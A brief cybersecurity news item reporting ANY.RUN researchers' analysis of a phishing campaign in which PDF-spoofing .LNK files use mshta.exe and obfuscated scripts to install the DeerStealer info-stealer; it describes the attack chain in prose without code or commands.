Cyber Security News reports that weaponized .LNK files have been used to facilitate the distribution of the DeerStealer malware as part of a novel phishing campaign.Attacks commence with the delivery of the PDF-spoofing 'Report.lnk' file that prompts mshta.exe execution of wildcard path-using scripts to evade detection, according to an analysis from ANY.RUN researchers. Aside from deactivating logging and profiling functionalities to ensure stealth, the script also conducts character pair decoding to conceal malicious logic before launching DeerStealer, which establishes persistence. "The script dynamically resolves URLs and binary content from obfuscated arrays, downloads a fake PDF file to distract the user, writes the payload into AppData and silently runs it," said ANY.RUN researchers, who noted that such findings showing the exploitation of the MITRE ATT&CK framework technique TI218.005 in addition to advanced detection bypass tactics indicate the sophistication of the intrusion.




